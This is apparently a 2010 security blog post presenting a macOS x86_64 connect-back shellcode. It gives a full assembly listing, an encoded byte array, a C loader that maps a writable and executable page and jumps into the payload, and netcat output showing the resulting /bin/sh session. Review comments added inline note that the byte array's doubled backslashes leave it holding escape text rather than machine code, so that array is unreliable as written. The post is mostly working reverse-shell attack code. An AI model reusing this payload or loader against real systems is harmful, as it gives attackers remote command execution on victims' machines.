22-Oct-2010 [18:49] -- x86_64 MacOS X connect() shellcode
Lately I have been researching the exploitation of buffer overflows, use-after-free, etc... but on x86_64 (concretely on MacOSX). I had my sample vulnerable programs, the 100% reliable exploits, etc... but could not find any interesting shellcode for this arch/platform. And you know... an int3 is not that exciting when you want to show this to your friends/family/fans/wife...
So, I had to develop my own... it contains NULL bytes, but for my exploitation that did not matter.
One thing I learnt is that it is way more elegant to write: no jmp/call/pop, since I use RIP-relative addressing :) AV and IPS should develop new generic techniques to find shellcodes.
Here we go; the IP and port are hardcoded (127.0.0.1:4444):
/*
MacOSX x86_64 connect() shellcode
Author: Fermin J. Serna
Twitter: @fjserna
Website: http://zhodiac.hispahack.com
Date: 21/Oct/2010
----
BITS 64
SECTION .text
GLOBAL _start
_start:
; socket = 0x2000061
xor rdi, rdi
inc rdi
inc rdi
xor rsi, rsi
inc rsi
xor rdx, rdx
mov eax, 0x2000061
mov r10, rcx
syscall
push rax ; push sock_fd for later use
; connect = 0x2000062
pop rdi
push rdi
lea rsi, [rel sockaddr_in]
xor rdx, rdx
mov dl, 0x10
mov eax, 0x2000062
mov r10, rcx
syscall
; dup2 = 0x200005a
pop rdi
push rdi
xor rsi, rsi
mov eax, 0x200005a
mov r10, rcx
syscall
; dup2 = 0x200005a
pop rdi
push rdi
xor rsi, rsi
inc rsi
mov eax, 0x200005a
mov r10, rcx
syscall
; dup2 = 0x200005a
pop rdi
push rdi
xor rsi, rsi
inc rsi
inc rsi
mov eax, 0x200005a
mov r10, rcx
syscall
; execve = 0x200003b
lea rdi, [rel cmd]
xor rdx, rdx
push rdx
push rdi
mov rsi, rsp
mov eax, 0x200003b
mov r10, rcx
syscall
; exit = 0x2000001
_exit:
xor rdi, rdi
mov eax, 0x2000001
syscall
sockaddr_in:
dd 0x5c110200 ; port 4444
dd 0x0100007f ; 127.0.0.1
dd 0x00000000
dd 0x00000000
cmd:
db '/bin/sh',0
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
/*
 * Assembled bytes of the listing in the comment above (socket, connect,
 * dup2 x3, execve, exit), followed by the sockaddr_in and "/bin/sh" data
 * that the two `lea ..., [rel ...]` instructions reach with RIP-relative
 * offsets. The hardcoded IP/port, the syscall numbers and the fixed byte
 * sequence are what a signature-based detector would key on.
 *
 * NOTE(review): the escapes appear here as "\\x" (doubled backslash); as
 * written the array holds the escape text rather than the machine-code
 * bytes — this looks like a copy/extraction artifact of the listing.
 * The author notes the payload contains NULL bytes; main() copies
 * sizeof(shellcode) bytes, so the literal's terminating NUL goes along.
 */
char shellcode[]=
"\\x48\\x31\\xff\\x48\\xff\\xc7\\x48\\xff\\xc7\\x48\\x31\\xf6\\x48\\xff\\xc6\\x48"
"\\x31\\xd2\\xb8\\x61\\x00\\x00\\x02\\x49\\x89\\xca\\x0f\\x05\\x50\\x5f\\x57\\x48"
"\\x8d\\x35\\x68\\x00\\x00\\x00\\x48\\x31\\xd2\\xb2\\x10\\xb8\\x62\\x00\\x00\\x02"
"\\x49\\x89\\xca\\x0f\\x05\\x5f\\x57\\x48\\x31\\xf6\\xb8\\x5a\\x00\\x00\\x02\\x49"
"\\x89\\xca\\x0f\\x05\\x5f\\x57\\x48\\x31\\xf6\\x48\\xff\\xc6\\xb8\\x5a\\x00\\x00"
"\\x02\\x49\\x89\\xca\\x0f\\x05\\x5f\\x57\\x48\\x31\\xf6\\x48\\xff\\xc6\\x48\\xff"
"\\xc6\\xb8\\x5a\\x00\\x00\\x02\\x49\\x89\\xca\\x0f\\x05\\x48\\x8d\\x3d\\x2c\\x00"
"\\x00\\x00\\x48\\x31\\xd2\\x52\\x57\\x48\\x89\\xe6\\xb8\\x3b\\x00\\x00\\x02\\x49"
"\\x89\\xca\\x0f\\x05\\x48\\x31\\xff\\xb8\\x01\\x00\\x00\\x02\\x0f\\x05\\x00\\x02"
"\\x11\\x5c\\x7f\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2f\\x62"
"\\x69\\x6e\\x2f\\x73\\x68\\x00\\x00";
/*
 * Test harness: maps one RWX page at a fixed address, copies the shellcode
 * array into it and jumps to it. argc/argv are unused.
 *
 * Returns 0 only if the payload returns; the listing above ends in an exit
 * syscall (_exit), so normally it does not. Calls exit(-1) after perror("mmap")
 * if the mapping cannot be created.
 *
 * From a defensive viewpoint this is the classic loader shape — an anonymous
 * writable+executable mapping, a memcpy of a byte blob into it, and an
 * indirect call through a data pointer — each of which a W^X policy, a
 * hardened-runtime/sandbox rule or an RWX-mapping alert can deny or flag.
 */
int main(int argc, char **argv) {
int (*sc)(); /* NOTE(review): old-style declarator; int (*sc)(void) is the prototyped form */
void *ptr=(void *)0x0000006000000000; /* requested address; with MAP_FIXED an existing mapping there would be replaced */
unsigned int counter; /* NOTE(review): never used */
/* RWX, fixed, anonymous, private. No check that sizeof(shellcode) fits in the 0x1000 mapping (it does for this array). */
ptr=mmap(ptr,0x1000,PROT_EXEC|PROT_WRITE|PROT_READ,MAP_FIXED|MAP_ANON|MAP_PRIVATE,0,0);
if (ptr==MAP_FAILED) {
perror("mmap");
exit(-1); /* NOTE(review): -1 becomes exit status 255; EXIT_FAILURE would be the portable spelling */
}
memcpy(ptr,shellcode,sizeof(shellcode)); /* sizeof includes the literal's terminating NUL */
sc=ptr; /* data pointer converted to function pointer: not strictly portable, but the usual loader idiom */
sc(); /* control transfers into the mapped page; not expected to return */
return 0;
}
And the result is:
Fermin-Sernas-MacBook-Pro:x Fer$ nc -lv 4444
id;
uid=501(Fer) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),204(_developer),100(_lpoperator),98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),61(localaccounts),12(everyone),401(com.apple.access_screensharing)
Fermin J. Serna - @fjserna